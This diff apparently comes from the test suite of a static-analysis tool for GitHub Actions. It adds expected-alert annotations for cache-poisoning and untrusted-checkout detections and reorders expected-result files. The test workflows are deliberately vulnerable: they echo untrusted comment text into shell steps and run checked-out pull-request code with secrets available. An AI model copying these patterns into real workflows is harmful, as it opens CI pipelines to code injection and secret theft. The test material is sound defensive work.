+8,5 @@ jobs: runs-on: ubuntu-latest steps: - run: | - echo ${{ github.event.comment.body }} + echo ${{ github.event.comment.body }} # $ Alert[actions/cache-poisoning/code-injection] diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml index 55efe8e9fec..7d6556c97c0 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml @@ -15,9 +15,9 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_sha }} - - uses: actions/cache@v2 + - uses: actions/cache@v2 # $ Source[actions/cache-poisoning/direct-cache] with: path: ./poison key: poison_key - - run: | + - run: | # $ Alert[actions/cache-poisoning/direct-cache] cat poison diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml index eb6373a406e..a6413290212 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml @@ -11,9 +11,9 @@ jobs: - uses: actions/checkout@v3 with: ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/cache@v2 + - uses: actions/cache@v2 # $ Source[actions/cache-poisoning/direct-cache] with: path: ./poison key: poison_key - - run: | + - run: | # $ Alert[actions/cache-poisoning/direct-cache] cat poison diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml index 3849d92cbcc..85a8d067f60 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml @@ -16,9 +16,9 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_sha }} - - uses: actions/cache@v2 + - uses: actions/cache@v2 # $ Source[actions/cache-poisoning/direct-cache] with: path: ./poison key: poison_key - - run: | + - run: | # $ Alert[actions/cache-poisoning/direct-cache] cat poison diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml index d3f51456de2..896c22d9243 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml @@ -14,9 +14,9 @@ jobs: - uses: actions/checkout@v3 with: ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/cache@v2 + - uses: actions/cache@v2 # $ Source[actions/cache-poisoning/direct-cache] with: path: ./poison key: poison_key - - run: | + - run: | # $ Alert[actions/cache-poisoning/direct-cache] cat poison diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml index ec0f9b0e6c9..1faedcf1b91 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml @@ -14,9 +14,9 @@ jobs: - uses: actions/checkout@v3 with: ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/cache@v2 + - uses: actions/cache@v2 # $ Source[actions/cache-poisoning/direct-cache] with: path: ./poison key: poison_key - - run: | + - run: | # $ Alert[actions/cache-poisoning/direct-cache] cat poison diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml index b9652d46b59..a17b62dbaff 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml @@ -13,7 +13,7 @@ jobs: - uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.sha }} - - name: Set up Python 3.10 + - name: Set up Python 3.10 # $ Source[actions/cache-poisoning/direct-cache] uses: actions/setup-python@v5 with: python-version: "3.10" @@ -23,4 +23,4 @@ jobs: with: path: ./results/pip key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }} - restore-keys: ${{ runner.os }}-pip- + restore-keys: ${{ runner.os }}-pip- # $ Alert[actions/cache-poisoning/direct-cache] diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml index 05f8e4a067a..d99592c830f 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml @@ -12,9 +12,9 @@ jobs: - uses: actions/checkout@v3 with: ref: ${{ steps.comment-branch.outputs.head_sha }} - - run: ./checkedout/poison + - run: ./checkedout/poison # $ Source[actions/cache-poisoning/poisonable-step] - pr-comment2: + pr-comment2: # $ Alert[actions/cache-poisoning/poisonable-step] runs-on: ubuntu-latest permissions: read-all steps: @@ -23,9 +23,9 @@ jobs: - uses: actions/checkout@v3 with: ref: ${{ steps.comment-branch.outputs.head_sha }} - - uses: ./.github/actions/node-npm-setup + - uses: ./.github/actions/node-npm-setup # $ Source[actions/cache-poisoning/poisonable-step] - pr-comment3: + pr-comment3: # $ Alert[actions/cache-poisoning/poisonable-step] runs-on: ubuntu-latest permissions: read-all steps: @@ -34,4 +34,4 @@ jobs: - uses: actions/checkout@v3 with: ref: ${{ steps.comment-branch.outputs.head_sha }} - - run: node .github/actions-scripts/what-docs-early-access-branch.js + - run: node .github/actions-scripts/what-docs-early-access-branch.js # $ Alert[actions/cache-poisoning/poisonable-step] Source[actions/cache-poisoning/poisonable-step] diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml index 60ba26406c6..60be3c02edb 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml @@ -17,11 +17,11 @@ jobs: with: ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Setup Pages + - name: Setup Pages # $ Source[actions/cache-poisoning/poisonable-step] uses: actions/configure-pages@v5 - name: Build with Jekyll uses: actions/jekyll-build-pages@v1 with: source: ./ - destination: ./_site + destination: ./_site # $ Alert[actions/cache-poisoning/poisonable-step] diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml index 8539bf2bda4..7ceb82a536f 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml @@ -16,4 +16,4 @@ jobs: ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - run: npm run build -w www + - run: npm run build -w www # $ Alert[actions/cache-poisoning/poisonable-step] Source[actions/cache-poisoning/poisonable-step] diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml index 6e2351c1744..33d28c1f292 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml @@ -15,4 +15,4 @@ jobs: with: ref: ${{ github.event.pull_request.head.sha }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - run: ./foo + - run: ./foo # $ Alert[actions/cache-poisoning/poisonable-step] Source[actions/cache-poisoning/poisonable-step] diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml index 9742bd01a48..082585088b1 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml @@ -19,10 +19,10 @@ jobs: with: ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Setup Pages + - name: Setup Pages # $ Source[actions/cache-poisoning/poisonable-step] uses: actions/configure-pages@983d7736d9b0ae728b81ab479565c72886d7745b # v5 - name: Build with Jekyll uses: actions/jekyll-build-pages@b178f9334b208360999a0a57b523613563698c66 # v1 with: source: ./ - destination: ./_site + destination: ./_site # $ Alert[actions/cache-poisoning/poisonable-step] diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected index 9cfac091f67..be669230722 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected +++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected @@ -1,3 +1,5 @@ +#select +| .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning ($@). | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/code_injection1.yml:2:3:2:15 | issue_comment | issue_comment | edges | .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | provenance | | nodes @@ -6,5 +8,3 @@ nodes | .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | semmle.label | steps.modified_files.outputs.files_modified | | .github/workflows/neg_code_injection1.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths -#select -| .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning ($@). | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/code_injection1.yml:2:3:2:15 | issue_comment | issue_comment | diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref index 8ac48aad93e..62a04c8718c 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref +++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref @@ -1,2 +1,2 @@ -Security/CWE-349/CachePoisoningViaCodeInjection.ql - +query: Security/CWE-349/CachePoisoningViaCodeInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected index 4cc8536b594..4014714be4b 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected +++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected @@ -1,3 +1,10 @@ +#select +| .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache1.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache2.yml:11:9:14:6 | Uses Step | .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache2.yml:3:5:3:23 | pull_request_target | pull_request_target | +| .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache3.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache5.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:13:9:16:6 | Uses Step | .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache6.yml:4:3:4:21 | pull_request_target | pull_request_target | edges | .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:9:16:71 | Run Step | | .github/workflows/direct_cache1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | @@ -43,10 +50,3 @@ edges | .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | -#select -| .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache1.yml:2:3:2:15 | issue_comment | issue_comment | -| .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache2.yml:11:9:14:6 | Uses Step | .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache2.yml:3:5:3:23 | pull_request_target | pull_request_target | -| .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache3.yml:2:3:2:15 | issue_comment | issue_comment | -| .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache5.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:13:9:16:6 | Uses Step | .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache6.yml:4:3:4:21 | pull_request_target | pull_request_target | diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref index 9d1910990fc..0002f755786 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref +++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref @@ -1,2 +1,2 @@ -Security/CWE-349/CachePoisoningViaDirectCache.ql - +query: Security/CWE-349/CachePoisoningViaDirectCache.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected index 6b1a3e87313..57a1fd7b8d8 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected +++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected @@ -1,3 +1,11 @@ +#select +| .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | .github/workflows/poisonable_step2.yml:15:9:20:6 | Uses Step | .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step2.yml:5:3:5:21 | pull_request_target | pull_request_target | +| .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | .github/workflows/poisonable_step3.yml:13:7:19:4 | Uses Step | .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step4.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step5.yml:3:3:3:21 | pull_request_target | pull_request_target | edges | .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:9:16:71 | Run Step | | .github/workflows/direct_cache1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | @@ -43,11 +51,3 @@ edges | .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | -#select -| .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment | -| .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment | -| .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment | -| .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | .github/workflows/poisonable_step2.yml:15:9:20:6 | Uses Step | .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step2.yml:5:3:5:21 | pull_request_target | pull_request_target | -| .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | .github/workflows/poisonable_step3.yml:13:7:19:4 | Uses Step | .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step3.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step4.yml:3:3:3:21 | pull_request_target | pull_request_target | -| .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step5.yml:3:3:3:21 | pull_request_target | pull_request_target | diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref index 89db21d70f5..9855767d1a8 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref +++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref @@ -1,2 +1,2 @@ -Security/CWE-349/CachePoisoningViaPoisonableStep.ql - +query: Security/CWE-349/CachePoisoningViaPoisonableStep.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml index a4acd738766..abea1002fd3 100644 --- a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml @@ -55,9 +55,9 @@ jobs: with: submodules: recursive ref: ${{ fromJson(steps.issue.outputs.result).ref }} - - run: bash comment_example/tests.sh + - run: bash comment_example/tests.sh # $ Source[actions/untrusted-checkout-toctou/critical] - test3: + test3: # $ Alert[actions/untrusted-checkout-toctou/critical] if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} runs-on: ubuntu-latest steps: @@ -65,4 +65,4 @@ jobs: with: submodules: recursive ref: "refs/pull/${{ github.event.number }}/merge" - - run: bash comment_example/tests.sh + - run: bash comment_example/tests.sh # $ Alert[actions/untrusted-checkout-toctou/critical] Source[actions/untrusted-checkout-toctou/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml index a4acd738766..abea1002fd3 100644 --- a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml @@ -55,9 +55,9 @@ jobs: with: submodules: recursive ref: ${{ fromJson(steps.issue.outputs.result).ref }} - - run: bash comment_example/tests.sh + - run: bash comment_example/tests.sh # $ Source[actions/untrusted-checkout-toctou/critical] - test3: + test3: # $ Alert[actions/untrusted-checkout-toctou/critical] if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} runs-on: ubuntu-latest steps: @@ -65,4 +65,4 @@ jobs: with: submodules: recursive ref: "refs/pull/${{ github.event.number }}/merge" - - run: bash comment_example/tests.sh + - run: bash comment_example/tests.sh # $ Alert[actions/untrusted-checkout-toctou/critical] Source[actions/untrusted-checkout-toctou/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml index 9444ad0b627..937f223a5a2 100644 --- a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml @@ -82,8 +82,8 @@ jobs: with: ref: ${{ steps.environment.outputs.head_sha }} - - name: Environment setup + - name: Environment setup # $ Source[actions/untrusted-checkout-toctou/critical] uses: ./.github/actions/setup-env with: - azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} # $ Alert[actions/untrusted-checkout-toctou/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml index e3e557cc511..5cd25eb52cb 100644 --- a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml @@ -90,7 +90,7 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_ref }} - - name: Get environment from comment + - name: Get environment from comment # $ Source[actions/untrusted-checkout-toctou/critical] id: environment shell: bash env: @@ -153,7 +153,7 @@ jobs: with: azure_creds: ${{ secrets.AZURE_CREDENTIALS }} - - name: Deploy server + - name: Deploy server # $ Alert[actions/untrusted-checkout-toctou/critical] if: >- ${{ (contains(github.event.comment.body, '/deploy to') || @@ -166,7 +166,7 @@ jobs: COMMENT_BODY: ${{ github.event.comment.body }} run: poetry run python server.py --endpoint_location=remote --autodeploy=True - - name: Deploy scorer + - name: Deploy scorer # $ Alert[actions/untrusted-checkout-toctou/critical] if: >- ${{ contains(github.event.comment.body, '/deploy as async scorer') || @@ -177,7 +177,7 @@ jobs: PR_NUMBER: ${{ github.event.issue.number }} run: poetry run python scorer.py --as_pipeline=True --schedule=True --autodeploy=True - - name: Set latest commit status as ${{ job.status }} + - name: Set latest commit status as ${{ job.status }} # $ Alert[actions/untrusted-checkout-toctou/critical] uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 if: always() with: diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml index 4a6d1452af2..bf14336adb6 100644 --- a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml @@ -44,7 +44,7 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_ref }} - - name: Install GH CLI + - name: Install GH CLI # $ Alert[actions/untrusted-checkout-toctou/high] uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 - name: Check comment keywords @@ -94,7 +94,7 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_ref }} - - name: Log into Azure + - name: Log into Azure # $ Alert[actions/untrusted-checkout-toctou/high] uses: azure/login@a65d910e8af852a8061c627c456678983e180302 # @v2.2.0 with: creds: ${{ secrets.AZURE_CREDENTIALS }} @@ -164,7 +164,7 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_ref }} - - name: Get pipeline info from comment + - name: Get pipeline info from comment # $ Source[actions/untrusted-checkout-toctou/critical] id: pipeline-info run: | model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') && \ @@ -215,13 +215,13 @@ jobs: with: azure_creds: ${{ secrets.AZURE_CREDENTIALS }} - - name: 